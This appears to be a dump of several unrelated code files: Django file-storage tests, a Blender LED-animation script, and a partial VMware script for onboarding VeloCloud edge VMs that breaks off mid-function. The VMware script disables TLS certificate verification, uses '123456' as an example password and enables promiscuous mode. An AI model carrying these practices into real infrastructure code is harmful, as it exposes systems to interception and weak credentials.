        self.assertEqual(obj.default.read(), b"default content")
        obj.default.close()

    def test_empty_upload_to(self):
        # upload_to can be empty, meaning it does not use subdirectory.
        obj = Storage()
        obj.empty.save('django_test.txt', ContentFile('more content'))
        self.assertEqual(obj.empty.name, "django_test.txt")
        self.assertEqual(obj.empty.read(), b"more content")
        obj.empty.close()

    def test_random_upload_to(self):
        # Verify the fix for #5655, making sure the directory is only
        # determined once.
        obj = Storage()
        obj.random.save("random_file", ContentFile("random content"))
        self.assertTrue(obj.random.name.endswith("/random_file"))
        obj.random.close()

    def test_custom_valid_name_callable_upload_to(self):
        """
        Storage.get_valid_name() should be called when upload_to is a callable.
        """
        obj = Storage()
        obj.custom_valid_name.save("random_file", ContentFile("random content"))
        # CustomValidNameStorage.get_valid_name() appends '_valid' to the name
        self.assertTrue(obj.custom_valid_name.name.endswith("/random_file_valid"))
        obj.custom_valid_name.close()

    def test_filefield_pickling(self):
        # Push an object into the cache to make sure it pickles properly
        obj = Storage()
        obj.normal.save("django_test.txt", ContentFile("more content"))
        obj.normal.close()
        cache.set("obj", obj)
        self.assertEqual(cache.get("obj").normal.name, "tests/django_test.txt")

    def test_file_object(self):
        """A plain Python file object is accepted as save() content."""
        # Create sample file
        temp_storage.save('tests/example.txt', ContentFile('some content'))
        # Load it as python file object
        with open(temp_storage.path('tests/example.txt')) as file_obj:
            # Save it using storage and read its content
            temp_storage.save('tests/file_obj', file_obj)
        self.assertTrue(temp_storage.exists('tests/file_obj'))
        with temp_storage.open('tests/file_obj') as f:
            self.assertEqual(f.read(), b'some content')

    def test_stringio(self):
        # Test passing StringIO instance as content argument to save
        output = StringIO()
        output.write('content')
        output.seek(0)
        # Save it and read written file
        temp_storage.save('tests/stringio', output)
        self.assertTrue(temp_storage.exists('tests/stringio'))
        with temp_storage.open('tests/stringio') as f:
            self.assertEqual(f.read(), b'content')
# Tests for a race condition on file saving (#4948).
# This is written in such a way that it'll always pass on platforms
# without threading.
class SlowFile(ContentFile):
    """ContentFile whose chunks() pauses, widening the save race window."""

    def chunks(self):
        # Sleep before handing data back so overlapping saves collide.
        time.sleep(1)
        return super().chunks()
class FileSaveRaceConditionTest(SimpleTestCase):
    """Two concurrent saves of the same name must not clobber each other."""

    def setUp(self):
        self.storage_dir = tempfile.mkdtemp()
        self.storage = FileSystemStorage(self.storage_dir)
        # The second saver runs in a thread; SlowFile widens the race window.
        self.thread = threading.Thread(target=self.save_file, args=['conflict'])

    def tearDown(self):
        shutil.rmtree(self.storage_dir)

    def save_file(self, name):
        # Thread body: save under a fixed name with deliberately slow content.
        name = self.storage.save(name, SlowFile(b"Data"))

    def test_race_condition(self):
        self.thread.start()
        self.save_file('conflict')
        self.thread.join()
        files = sorted(os.listdir(self.storage_dir))
        # One save keeps the requested name; the other gets a random suffix.
        self.assertEqual(files[0], 'conflict')
        self.assertRegex(files[1], 'conflict_%s' % FILE_SUFFIX_REGEX)
@unittest.skipIf(sys.platform.startswith('win'), "Windows only partially supports umasks and chmod.")
class FileStoragePermissions(unittest.TestCase):
    """File and directory mode handling for FileSystemStorage uploads."""

    def setUp(self):
        # Pin the umask so the default-permission assertions are deterministic.
        self.umask = 0o027
        self.old_umask = os.umask(self.umask)
        self.storage_dir = tempfile.mkdtemp()

    def tearDown(self):
        shutil.rmtree(self.storage_dir)
        os.umask(self.old_umask)

    @override_settings(FILE_UPLOAD_PERMISSIONS=0o654)
    def test_file_upload_permissions(self):
        """FILE_UPLOAD_PERMISSIONS is applied verbatim to saved files."""
        self.storage = FileSystemStorage(self.storage_dir)
        name = self.storage.save("the_file", ContentFile("data"))
        actual_mode = os.stat(self.storage.path(name))[0] & 0o777
        self.assertEqual(actual_mode, 0o654)

    @override_settings(FILE_UPLOAD_PERMISSIONS=None)
    def test_file_upload_default_permissions(self):
        """With no explicit setting, files get 0o666 masked by the umask."""
        self.storage = FileSystemStorage(self.storage_dir)
        fname = self.storage.save("some_file", ContentFile("data"))
        mode = os.stat(self.storage.path(fname))[0] & 0o777
        self.assertEqual(mode, 0o666 & ~self.umask)

    @override_settings(FILE_UPLOAD_DIRECTORY_PERMISSIONS=0o765)
    def test_file_upload_directory_permissions(self):
        """FILE_UPLOAD_DIRECTORY_PERMISSIONS applies to created directories."""
        self.storage = FileSystemStorage(self.storage_dir)
        name = self.storage.save("the_directory/the_file", ContentFile("data"))
        dir_mode = os.stat(os.path.dirname(self.storage.path(name)))[0] & 0o777
        self.assertEqual(dir_mode, 0o765)

    @override_settings(FILE_UPLOAD_DIRECTORY_PERMISSIONS=None)
    def test_file_upload_directory_default_permissions(self):
        """With no explicit setting, directories get 0o777 masked by the umask."""
        self.storage = FileSystemStorage(self.storage_dir)
        name = self.storage.save("the_directory/the_file", ContentFile("data"))
        dir_mode = os.stat(os.path.dirname(self.storage.path(name)))[0] & 0o777
        self.assertEqual(dir_mode, 0o777 & ~self.umask)
class FileStoragePathParsing(SimpleTestCase):
    """How dotted paths split into base name and extension when deduplicating."""

    def setUp(self):
        self.storage_dir = tempfile.mkdtemp()
        self.storage = FileSystemStorage(self.storage_dir)

    def tearDown(self):
        shutil.rmtree(self.storage_dir)

    def test_directory_with_dot(self):
        """Regression test for #9610.
        If the directory name contains a dot and the file name doesn't, make
        sure we still mangle the file name instead of the directory name.
        """
        self.storage.save('dotted.path/test', ContentFile("1"))
        self.storage.save('dotted.path/test', ContentFile("2"))
        files = sorted(os.listdir(os.path.join(self.storage_dir, 'dotted.path')))
        # The directory itself must never be renamed.
        self.assertFalse(os.path.exists(os.path.join(self.storage_dir, 'dotted_.path')))
        self.assertEqual(files[0], 'test')
        self.assertRegex(files[1], 'test_%s' % FILE_SUFFIX_REGEX)

    def test_first_character_dot(self):
        """
        File names with a dot as their first character don't have an extension,
        and the underscore should get added to the end.
        """
        self.storage.save('dotted.path/.test', ContentFile("1"))
        self.storage.save('dotted.path/.test', ContentFile("2"))
        files = sorted(os.listdir(os.path.join(self.storage_dir, 'dotted.path')))
        self.assertFalse(os.path.exists(os.path.join(self.storage_dir, 'dotted_.path')))
        self.assertEqual(files[0], '.test')
        self.assertRegex(files[1], '.test_%s' % FILE_SUFFIX_REGEX)
class ContentFileStorageTestCase(unittest.TestCase):
    """Saving ContentFile instances through FileSystemStorage."""

    def setUp(self):
        self.storage_dir = tempfile.mkdtemp()
        self.storage = FileSystemStorage(self.storage_dir)

    def tearDown(self):
        shutil.rmtree(self.storage_dir)

    def test_content_saving(self):
        """
        ContentFile can be saved correctly with the filesystem storage,
        if it was initialized with either bytes or unicode content.
        """
        self.storage.save('bytes.txt', ContentFile(b"content"))
        # Non-ASCII text also exercises the encoding path.
        self.storage.save('unicode.txt', ContentFile("español"))
@override_settings(ROOT_URLCONF='file_storage.urls')
class FileLikeObjectTestCase(LiveServerTestCase):
    """
    Test file-like objects (#15644).
    """
    available_apps = []

    def setUp(self):
        self.temp_dir = tempfile.mkdtemp()
        self.storage = FileSystemStorage(location=self.temp_dir)

    def tearDown(self):
        shutil.rmtree(self.temp_dir)

    def test_urllib2_urlopen(self):
        """
        Test the File storage API with a file like object coming from urllib2.urlopen()
        """
        file_like_object = urlopen(self.live_server_url + '/')
        f = File(file_like_object)
        stored_filename = self.storage.save("remote_file.html", f)
        # Fetch the page again for a byte-for-byte comparison with the copy.
        remote_file = urlopen(self.live_server_url + '/')
        with self.storage.open(stored_filename) as stored_file:
            self.assertEqual(stored_file.read(), remote_file.read())
|
blender.py | import sys
import os
import threading
import importlib
import bpy
sys.path.append(os.path.dirname(bpy.data.filepath))
import neopixel
importlib.reload(neopixel)
xmaslights = __import__("xmaslights-spin")
importlib.reload(xmaslights)
xmaslights.coordfilename = os.path.join(os.path.dirname(bpy.data.filepath),"coords.txt")
duration_seconds = 10
def stop_after_duration():
    """Signal the animation to stop once duration_seconds have elapsed."""
    from time import sleep
    sleep(duration_seconds)
    neopixel.finished = True
if __name__ == "__main__":
    # Worker that flips neopixel.finished after duration_seconds.
    stop_thread = threading.Thread(target=stop_after_duration)
    # Create the LED objects before starting the timer
    pixels = neopixel.NeoPixel()
    neopixel.finished = False
    stop_thread.start()
    try:
        # Runs until the animation notices neopixel.finished and raises.
        xmaslights.xmaslight()
    except neopixel.FinishedException:
        pass
    stop_thread.join()
|
vnf.onboard.py | #!/usr/bin/python
"""
After ESXi on-boarding finishes, it pushes a new job to an AMQP queue.
This listener should receive the event via AMQP and start VNF on-boarding.
In this specific case VNF listener on-boards a Velo Cloud VNF.
In order to do that it must have access to the VNF image; the image itself may
contain the respective OVF and VMDK files.
The script doesn't untar the OVA file; the client must make sure it untars the
respective OVA file and uploads it to the directory indicated in image-dir.
Example configuration in default.yaml.
- Script must contain valid enterpriseId that is configured in Velo Cloud Orchestrator platform.
- It must have access to Velo Cloud because the listener creates a Velo Edge device for each remote ESXi host.
- Prepare Profile. In this case it called test.
- untar velo gateway OVA file to a target dir image-dir.
It should contain VeloCloud-Edge.ovf and respected VMDK file.
vnf-dir: "/Users/spyroot/PycharmProjects/ydk-netconf/vcenter/image"
image-dir: "/Users/spyroot/PycharmProjects/ydk-netconf/vcenter/final_image"
enterpriseId: 42 # we need to know id in order to get activation key
vce-vco: "velo cloud host address"
vco-username: "mbayramov@vmware.com"
vco-password: "123456"
ovf-filename: "VeloCloud-Edge.ovf" # we should have ovf file and vmdk file in vnf-dir
vnf-default-password: "123456" # default password for edge
vnf-default-name: "velo-edge-vc" # default name search on each new host
profile-name: "test " # VCO should have this profile
vnf-dir: "/Users/spyroot/PycharmProjects/ydk-netconf/vcenter/image"
image-dir: "/Users/spyroot/PycharmProjects/ydk-netconf/vcenter/final_image"
In the second section we need to provide information about the default network that the listener will configure on the remote ESXi
host in order to connect the Velo Edge.
You probably need change only pnic name. pnic0/pnic1 etc. ( it must be two unused pnic on a remote host)
for example if pnic0 used for vSwitch0
We can assign pnic1 and pnic2 to vSwitch2 and vSwitch3. One switch used to communicate to outside network
(Internet / MPLS cloud and another switch used to communicate back to office network)
vnf-network:
topology:
- network: 1
vswitch: "vSwitch2"
port-group-name: "VeloOutside"
pnic: "vusb0" # todo add multi pnic support
interface-name: ["GE1", "GE3"]
vlan_id: 0
- network: 2
vswitch: "vSwitch3"
port-group-name: "VeloInside"
pnic: "vusb1"
interface-name: ["GE2", "GE4", "GE5"]
vlan_id: 0
Mustafa Bayramov
mbayramov@vmware.com
"""
import atexit
import re
import yaml
import inspect
import time
import subprocess
import ssl
import sys
import os
from pyVim import connect
import logging
import dataset
import time
import pika
import json
from time import sleep
import socket
import atexit
from pyVim import connect
from vcenter.tools import cli
from vcenter.tools import tasks
import os
import tarfile
from pyVim.connect import SmartConnect
from pyVmomi import vim
import pyVmomi
import ssl
import tarfile
from threading import Thread
import subprocess
from xml.dom.minidom import parse, parseString
from pprint import pprint
import pprint
import urllib2
import ztp.velocloud
from ztp.velocloud.rest import ApiException
import argparse
# Root logger: mirror all messages to a log file and to stdout.
logging.basicConfig(
    format='%(asctime)s %(levelname)s %(message)s',
    handlers=[logging.FileHandler("vnf_onboarding.log"), logging.StreamHandler(sys.stdout)],
    level=logging.INFO)
# vCenter endpoints often use self-signed certs; disable verification.
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_NONE
parser = argparse.ArgumentParser()
parser.add_argument('-c', '--config', help='Path to config file', required=False)
args = vars(parser.parse_args())
DEFAULT_CONFIG = "config/default.yaml"
if args['config']:
    DEFAULT_CONFIG = args['config']
# read config and create default connector to vCenter.
# safe_load avoids arbitrary object construction from the YAML file, and the
# context manager closes the handle that the original open() call leaked.
with open(DEFAULT_CONFIG) as config_file:
    config = yaml.safe_load(config_file)
si = SmartConnect(host=config["vcenter"]["ip"],
                  user=config["vcenter"]["user"],
                  pwd=config["vcenter"]["password"], port=443,
                  sslContext=context)
content = si.content
def get_all_objs(content, vimtype):
    """
    Return every managed object of the given VIM type, mapped to its name.
    :param content: service instance content (si.content)
    :param vimtype: list of vim types to collect
    :return: dict of managed-object-ref -> name
    """
    view = content.viewManager.CreateContainerView(
        content.rootFolder, vimtype, True)
    return {ref: ref.name for ref in view.view}
def get_obj(content, vimtype, name):
    """
    Return the first vSphere object of the given type with a matching name.
    :param content: service instance content (si.content)
    :param vimtype: list of vim types to search
    :param name: exact object name to look for
    :return: matching managed object, or None when nothing matches
    """
    container = content.viewManager.CreateContainerView(content.rootFolder,
                                                        vimtype, True)
    return next((item for item in container.view if item.name == name), None)
def provision(vm):
    """
    Power on the given VNF virtual machine unless it is already running.
    :param vm: virtual machine object to power on
    :return: None
    """
    logging.info("The current powerState is: {0}".format(vm.runtime.powerState))
    if 'poweredOn' not in vm.runtime.powerState:
        power_task = vm.PowerOnVM_Task()
        tasks.wait_for_tasks(si, [power_task])
        logging.info("The current powerState is: {0}".format(vm.runtime.powerState))
    else:
        logging.info("VNF already in power on state.")
def tardir(path, tar_name):
    """
    Pack every file found under *path* into an uncompressed tar archive.
    :param path: directory tree to archive
    :param tar_name: output tar file name
    :return: None
    """
    with tarfile.open(tar_name, "w:") as archive:
        for dirpath, _dirnames, filenames in os.walk(path):
            for filename in filenames:
                archive.add(os.path.join(dirpath, filename))
def populate_ova(vnf_property_dict=None):
    """
    Populate OVF entries for a Velo Cloud edge and pack everything as a single OVA image.

    :param vnf_property_dict: dict with 'vnf_dir', 'ovf_filename', 'image_dir',
        'target_host', 'vce.vco', 'activation_code' and 'password' keys
    :return: path to the generated OVA file, or None when the source OVF is missing
    """
    logging.info("OVF adaptation.")
    path_to_files = vnf_property_dict['vnf_dir'] + '/' + vnf_property_dict['ovf_filename']
    if not os.path.exists(path_to_files):
        # Bug fix: the original fell through with an undefined descriptor and
        # crashed with NameError below; fail early and explicitly instead.
        logging.warning("OVF file {0} not found.".format(path_to_files))
        return None
    with open(path_to_files) as datasource:
        ovf_descriptor = parse(datasource)
        for section in ovf_descriptor.getElementsByTagName("ProductSection"):
            for ovf_property in section.getElementsByTagName('Property'):
                key = ovf_property.attributes['ovf:key'].value
                if 'velocloud.vce.vco' == key:
                    ovf_property.attributes['ovf:value'].value = vnf_property_dict['vce.vco']
                if 'velocloud.vce.activation_code' in key:
                    ovf_property.attributes['ovf:value'].value = vnf_property_dict['activation_code']
                if 'velocloud.vce.vco_ignore_cert_errors' in key:
                    ovf_property.attributes['ovf:value'].value = "true"
                if 'password' in key:
                    ovf_property.attributes['ovf:value'].value = vnf_property_dict['password']
    # Write the adapted descriptor into a per-host staging directory.
    final_dir = vnf_property_dict['image_dir'] + '/' + vnf_property_dict['target_host'] + '/'
    if not os.path.exists(final_dir):
        os.makedirs(final_dir)
    new_ovf_file = "{0}/{1}/{2}".format(vnf_property_dict['image_dir'],
                                        vnf_property_dict['target_host'],
                                        vnf_property_dict['ovf_filename'])
    # The 'with' block closes the handle; the original also called close() a
    # second time redundantly and carried a dead 'final_dir is None' check.
    with open(new_ovf_file, "wb") as file_handle:
        ovf_descriptor.writexml(file_handle, encoding="utf-8")
    # Pack the whole VNF directory (OVF + VMDKs) into one OVA.
    new_vnf_image = final_dir + '/edge.ova'
    tardir(vnf_property_dict['vnf_dir'], new_vnf_image)
    return new_vnf_image
def get_obj_in_list(obj_name, obj_list):
    """
    Return the object in *obj_list* whose ``name`` attribute equals *obj_name*.

    :param obj_name: name to search for
    :param obj_list: iterable of vCenter inventory objects
    :return: the matching object, or None when no object matches
    """
    for candidate in obj_list:
        if candidate.name == obj_name:
            return candidate
    # Bug fix: the original message printed the *last* list element's name
    # (raising NameError on an empty list) instead of the requested name.
    print("Unable to find object by the name of %s in list:\n%s"
          % (obj_name, map(lambda o: o.name, obj_list)))
    return None
def get_objects(si=None, vim_dict=None):
    """
    Return a dict with the datacenter, datastore and resource pool objects
    needed to deploy an OVF container file.

    :param si: service instance connection to vCenter
    :param vim_dict: dict that may contain 'datacenter_name',
        'datastore_name' and 'cluster_name' keys
    :return: dict with 'datacenter', 'datastore' and 'resource pool' keys,
        or False when a required object cannot be resolved
    """
    # get data center object.
    datacenter_list = si.content.rootFolder.childEntity
    if 'datacenter_name' not in vim_dict:
        return False
    datacenter_obj = get_obj_in_list(vim_dict['datacenter_name'], datacenter_list)
    # get datastore object: by explicit name first, otherwise the first found.
    datastore_list = datacenter_obj.datastoreFolder.childEntity
    if "datastore_name" in vim_dict:
        datastore_obj = get_obj_in_list(vim_dict['datastore_name'], datastore_list)
    elif len(datastore_list) > 0:
        datastore_obj = datastore_list[0]
    else:
        print("No datastores found in DC (%s)." % datacenter_obj.name)
        return False
    # Get cluster object.
    cluster_list = datacenter_obj.hostFolder.childEntity
    if 'cluster_name' in vim_dict:
        cluster_obj = get_obj_in_list(vim_dict['cluster_name'], cluster_list)
    elif len(cluster_list) > 0:
        cluster_obj = cluster_list[0]
    else:
        print("No clusters found in DC (%s)." % datacenter_obj.name)
        # Bug fix: the original fell through and raised NameError on
        # cluster_obj below; bail out like the datastore branch does.
        return False
    # Generate resource pool.
    resource_pool_obj = cluster_obj.resourcePool
    return {"datacenter": datacenter_obj,
            "datastore": datastore_obj,
            "resource pool": resource_pool_obj}
def get_ovf_descriptor(ovf_path):
    """
    Read the OVF descriptor (or any file) and return its content as a string.

    :param ovf_path: path to the file to read
    :return: the file content, or None when the file cannot be read
    """
    try:
        with open(ovf_path, 'r') as ovf_file:
            return ovf_file.read()
    except IOError:
        # Bug fix: the original opened the file *outside* its try block, so an
        # unreadable path raised instead of being reported here; it also used
        # a bare except and closed the handle twice inside the 'with'.
        logging.info("Could not read file: %s" % ovf_path)
        return None
def keep_lease_alive(lease):
    """
    Keep the HTTP NFC lease alive while the VMDK upload is in progress.

    Runs until the lease completes or is released; intended as the body of a
    worker thread started alongside the upload.

    :param lease: HttpNfcLease object being renewed
    """
    while True:
        sleep(5)
        try:
            # Choosing arbitrary percentage to keep the lease alive.
            lease.HttpNfcLeaseProgress(50)
            if lease.state == vim.HttpNfcLease.State.done:
                return
        # If the lease is released, we get an exception.
        # Returning to kill the thread.
        except:
            return
def get_esxi_host(target_host=None):
    """
    Search the vCenter inventory for a host by name.

    :param target_host: host name to match exactly
    :return: the matching vim.HostSystem, or None when not found
    """
    host_view = content.viewManager.CreateContainerView(
        content.rootFolder, [vim.HostSystem], True)
    # Scan the flat inventory view for an exact name match.
    for candidate in host_view.view:
        if target_host == candidate.name:
            return candidate
    return None
def create_vnf_image(vnf_property_dict=None, config=None, ovf_adapt_fn=None):
    """
    Deploy the VNF OVF to the target ESXi host, upload its VMDKs, and power
    the resulting VM on.

    :param ovf_adapt_fn: optional callback that rewrites the OVF before upload
    :param config: parsed YAML config; config['vcenter']['ip'] is used to
        build the VMDK upload endpoint
    :param vnf_property_dict: must contain 'target_host', 'image_dir',
        'vnf_dir' and 'ovf_filename'
    :return: True on success, False when validation or lookup fails
    """
    # populate ova setting
    if ovf_adapt_fn is not None:
        logging.info("OVF adaptation callback.")
        ovf_adapt_fn(vnf_property_dict=vnf_property_dict)
    # find host where we want deploy VM
    objview = content.viewManager.CreateContainerView(
        content.rootFolder, [vim.HostSystem], True)
    esxi_hosts = objview.view
    # we search for target ESXi system in vCenter inventory
    target_host = None
    for esxi_host in esxi_hosts:
        if vnf_property_dict['target_host'] == esxi_host.name:
            target_host = esxi_host
    # if we didn't found target host
    if target_host is None:
        logging.warning("Target host {0} not found".format(vnf_property_dict['target_host']))
        return False
    # we choose largest storage on target esxi host
    target_datastore = {'freeSpace': 0}
    for ds in target_host.datastore:
        storage_data = ds.summary
        if storage_data.type == 'VMFS':
            if target_datastore['freeSpace'] < storage_data.freeSpace:
                target_datastore['datastore'] = storage_data.datastore
                target_datastore['name'] = storage_data.name
    # NOTE(review): 'Datacenter' and 'uCPE' are hard-coded inventory names —
    # confirm they match the target vCenter before reuse.
    vim_dict = {'datacenter_name': 'Datacenter',
                'cluster_name': 'uCPE',
                'datastore_name': target_datastore['name']}
    objects = get_objects(si=si, vim_dict=vim_dict)
    # read generate OVF file (the per-host adapted copy written by populate_ova)
    ovffilename = "{0}/{1}/{2}".format(vnf_property_dict['image_dir'],
                                       vnf_property_dict['target_host'],
                                       vnf_property_dict['ovf_filename'])
    # populate list of vmdk files
    path_to_vmdk = vnf_property_dict['vnf_dir'] + '/.'
    files = [f for f in os.listdir(path_to_vmdk) if re.match(r'[a-zA-z0-9]+.*\.vmdk', f)]
    if files is None or len(files) == 0:
        logging.warning("Image not found in {0}.".format(path_to_vmdk))
        return False
    ovfd = get_ovf_descriptor(ovffilename)
    # generate name and create import spec
    manager = si.content.ovfManager
    uuid = get_uuidbyip(vnf_property_dict['target_host'])
    vm_name = "{0}.{1}".format("velo-edge-vc", uuid)
    # for esxi_host in esxi_hosts:
    #     if vnf_property_dict['target_host'] == esxi_host.name:
    #         print(esxi_host.config.network)
    # print(get_obj(content, [vim.Network], 'VeloOutside'))
    outside = get_obj(content, [vim.Network], 'VeloOutside')
    if outside is None:
        logging.debug("Port group VeloOutside not present")
    inside = get_obj(content, [vim.Network], 'VeloInside')
    if inside is None:
        logging.debug("Port group VeloInside not present")
    # print(outside)
    # Map the edge's GE interfaces onto the inside/outside port groups.
    netmap = [vim.OvfManager.NetworkMapping(name="GE1", network=inside),
              vim.OvfManager.NetworkMapping(name="GE2", network=inside),
              vim.OvfManager.NetworkMapping(name="GE3", network=outside),
              vim.OvfManager.NetworkMapping(name="GE4", network=outside),
              vim.OvfManager.NetworkMapping(name="GE5", network=inside),
              vim.OvfManager.NetworkMapping(name="GE6", network=inside)]
    spec_params = vim.OvfManager.CreateImportSpecParams(entityName=vm_name, ipAllocationPolicy='fixedPolicy',
                                                        networkMapping=netmap, ipProtocol='IPv4')
    import_spec = manager.CreateImportSpec(ovfd,
                                           objects["resource pool"],
                                           objects['datastore'],
                                           spec_params)
    # in case OVF invalid import_sec will should have error flag.
    if len(import_spec.error) == 0:
        logging.info("OVF import is validated.")
    else:
        logging.info("Incorrect ovf format. vCenter rejected proposed OVF.")
        print(import_spec.error)
        return False
    # Start the import; the lease gates the actual disk upload.
    lease = objects["resource pool"].ImportVApp(import_spec.importSpec,
                                                objects["datacenter"].vmFolder,
                                                target_host)
    logging.info("Creating lease object and uploading ovf.")
    while True:
        if lease.state == vim.HttpNfcLease.State.ready:
            # Renew the lease from a side thread while the upload runs.
            keepalive_thread = Thread(target=keep_lease_alive, args=(lease,))
            keepalive_thread.start()
            for deviceUrl in lease.info.deviceUrl:
                url = deviceUrl.url.replace('*', config['vcenter']['ip'])
                fileItem = list(filter(lambda x: x.deviceId == deviceUrl.importKey, import_spec.fileItem))[0]
                vmdkfilename = "{0}/{1}".format(vnf_property_dict['vnf_dir'], fileItem.path)
                # NOTE(review): the VMDK is read in text mode via
                # get_ovf_descriptor — presumably tolerated by the runtime in
                # use here; confirm for binary-safe uploads.
                imgfd = get_ovf_descriptor(vmdkfilename)
                imgfd_size = os.stat(vmdkfilename)
                logging.info("Uploading file {0} file size {1}".format(vmdkfilename, imgfd_size.st_size))
                logging.info("Target endpoint {0}".format(url))
                headers = {"Content-length": imgfd_size.st_size}
                req = urllib2.Request(url, imgfd, headers)
                response = urllib2.urlopen(req, context=context)
                returncode = response.getcode()
                if 200 <= returncode < 300:
                    logging.info("OVA successfully uploaded.")
            lease.HttpNfcLeaseComplete()
            keepalive_thread.join()
            logging.info("OVF uploaded - changing power state of VNF.")
            vnf = find_vnf(vnf_property_dict=vnf_property_dict, name=vm_name)
            provision(vnf)
            return True
        elif lease.state == vim.HttpNfcLease.State.error:
            logging.info("Lease error: %s" % lease.error)
            break
def find_vnf(vnf_property_dict=None, name=None):
    """
    Search for a VNF virtual machine on the target ESXi host.

    :param name: optional VNF name substring to match first
    :param vnf_property_dict: must contain 'target_host' (hostname to search)
        and 'vnf_default_name' (fallback VM name substring)
    :return: the vm object, or None when no VNF is found
    """
    all_esxi_hosts = get_all_objs(content, [vim.HostSystem])
    for host in all_esxi_hosts:
        # find target host by hostname
        if vnf_property_dict['target_host'] in host.name:
            # find VM and power on.
            for vm in host.vm:
                if name is not None and name in vm.name:
                    logging.info("VNF -> {0} in a system.".format(name))
                    return vm
                if vnf_property_dict['vnf_default_name'] in vm.name:
                    # Bug fix: this branch logged `name`, which is None
                    # whenever the fallback match triggers; log the VM found.
                    logging.info("VNF -> {0} in a system.".format(vm.name))
                    return vm
    return None
def callback(vnf_property_dict=None, config=None, ovf_adapt_fn=None):
    """
    Main on-boarding callback.

    If the VNF is already on-boarded on the target host it is simply powered
    on; otherwise a new VNF image is pushed to the host.

    :param vnf_property_dict: must contain 'target_host' indicating where
        to deploy the VNF
    :param config: parsed YAML configuration
    :param ovf_adapt_fn: optional callback the caller may use to populate
        custom OVF attributes (password / IP / default network)
    :return: None
    """
    existing_vnf = find_vnf(vnf_property_dict=vnf_property_dict)
    if existing_vnf is not None:
        logging.info("Changing power state for VNF.")
        provision(existing_vnf)
    else:
        create_vnf_image(vnf_property_dict=vnf_property_dict, config=config, ovf_adapt_fn=ovf_adapt_fn)
def delHostSwitch(host, vswitchName):
    """
    Remove a standard virtual switch from the given ESXi host.

    :param host: vim.HostSystem to operate on
    :param vswitchName: name of the vSwitch to delete
    :return: None
    """
    # The original built an unused VirtualSwitch.Specification here; the
    # delete call only needs the switch name.
    host.configManager.networkSystem.DelVirtualSwitch(vswitchName)
def addHostSwitch(host, vswitchName, pnicName=None):
    """
    Add a new standard virtual switch, uplinked to *pnicName*, to an ESXi host.

    :param host: vim.HostSystem to configure
    :param vswitchName: name for the new vSwitch
    :param pnicName: physical NIC device name (e.g. 'vusb0') to bond
    :return: None; logs a warning when the pnic is not present on the host
    """
    # Find the physical NIC object on the host by device name.
    pnic = None
    for host_pnic in host.config.network.pnic:
        if pnicName == host_pnic.device:
            pnic = host_pnic
            break
    # Guard clause replaces the original if/else; the unused 'pnic_found'
    # and 'pnic_list' locals were dropped.
    if pnic is None:
        logging.warning("Error pnic {0} not found on the target host.".format(pnicName))
        return
    vswitch_spec = pyVmomi.vim.host.VirtualSwitch.Specification()
    vswitch_spec.numPorts = 16
    vswitch_spec.mtu = 1500
    vswitch_spec.bridge = vim.host.VirtualSwitch.BondBridge(nicDevice=[pnic.device])
    host.configManager.networkSystem.AddVirtualSwitch(vswitchName, vswitch_spec)
def AddHostPortgroup(host, vswitchName, portgroupName, vlanId):
    """
    Add a port group to an existing vSwitch on the given ESXi host.

    :param host: vim.HostSystem to configure
    :param vswitchName: vSwitch the port group attaches to
    :param portgroupName: name of the new port group
    :param vlanId: VLAN id for the port group (0 = untagged)
    :return: None
    """
    portgroup_spec = pyVmomi.vim.host.PortGroup.Specification()
    portgroup_spec.vswitchName = vswitchName
    portgroup_spec.name = portgroupName
    portgroup_spec.vlanId = int(vlanId)
    # NOTE(review): promiscuous mode is enabled while MAC changes and forged
    # transmits stay disabled — presumably required by the Velo Edge; confirm.
    network_policy = pyVmomi.vim.host.NetworkPolicy()
    network_policy.security = pyVmomi.vim.host.NetworkPolicy.SecurityPolicy()
    network_policy.security.allowPromiscuous = True
    network_policy.security.macChanges = False
    network_policy.security.forgedTransmits = False
    portgroup_spec.policy = network_policy
    host.configManager.networkSystem.AddPortGroup(portgroup_spec)
def get_uuidbyip(name):
    """
    Return the hardware UUID of the ESXi host whose inventory name contains
    *name*, or None when no such host exists (or *name* is empty/None).

    :type name: basestring
    :return: UUID string or None
    """
    if not name:
        return None
    # find host where we want deploy VM
    host_view = content.viewManager.CreateContainerView(
        content.rootFolder, [vim.HostSystem], True)
    matches = (h.hardware.systemInfo.uuid for h in host_view.view if name in h.name)
    return next(matches, None)
def find_vswitch(switch_name=None, esxi_hostname=None):
    """
    Find a standard vSwitch by name on a given ESXi host.

    :param switch_name: vSwitch name to match exactly
    :param esxi_hostname: name of the host to inspect
    :type switch_name: basestring
    :type esxi_hostname: basestring
    :return: the vSwitch object, or None when host or switch is absent
    """
    host = get_esxi_host(esxi_hostname)
    if host is None:
        return None
    for candidate in host.config.network.vswitch:
        if candidate.name == switch_name:
            return candidate
    return None
def find_port_group(switch_name=None, esxi_host=None, pg_name=None):
    """
    Find a port group by name on a given ESXi host, but only when the named
    vSwitch exists on that host.

    :param switch_name: vSwitch the port group should belong to
    :param esxi_host: vim.HostSystem to inspect
    :param pg_name: port group name to match exactly
    :type switch_name: basestring
    :type esxi_host: vim.HostSystem
    :type pg_name: basestring
    :return: the port group object, or None
    """
    if find_vswitch(switch_name=switch_name, esxi_hostname=esxi_host.name) is None:
        return None
    for portgroup in esxi_host.config.network.portgroup:
        if portgroup.spec.name == pg_name:
            return portgroup
    return None
def create_switches(vnf_property_dict=None, switch_list=None):
    """
    Ensure every vSwitch and port group described in *switch_list* exists on
    the target ESXi host, creating them when missing.

    :param vnf_property_dict: dict holding at least 'target_host'
    :param switch_list: list of dicts with keys 'vswitch', 'pnic',
                        'port-group-name' and 'vlan_id'
    :return: True when the (last checked) switch and port group are
             confirmed present, False otherwise
    """
    logging.info("Creating vswitches on target host.")
    esxi_host = get_esxi_host(target_host=vnf_property_dict['target_host'])
    if esxi_host is None:
        logging.debug("Can't find target esxi host.")
        return False
    sw_is_added = False
    pg_is_added = False
    # Pass 1: for every switch in the list we create respected switch on the
    # esxi host, retrying because the host applies changes asynchronously.
    for sw_dict in switch_list:
        sw_is_added = False
        switch_add_retry = 0
        while sw_is_added is False:
            if switch_add_retry == 3:
                break
            # search for switch
            if find_vswitch(sw_dict['vswitch'], vnf_property_dict['target_host']) is not None:
                logging.info("Found vswitch {0}".format(sw_dict['vswitch']))
                sw_is_added = True
            else:
                logging.info("Creating vswitch {0} pnic {1}".format(sw_dict['vswitch'], sw_dict['pnic']))
                addHostSwitch(esxi_host, sw_dict['vswitch'], pnicName=sw_dict['pnic'])
                # Re-check after creating. The original code had this
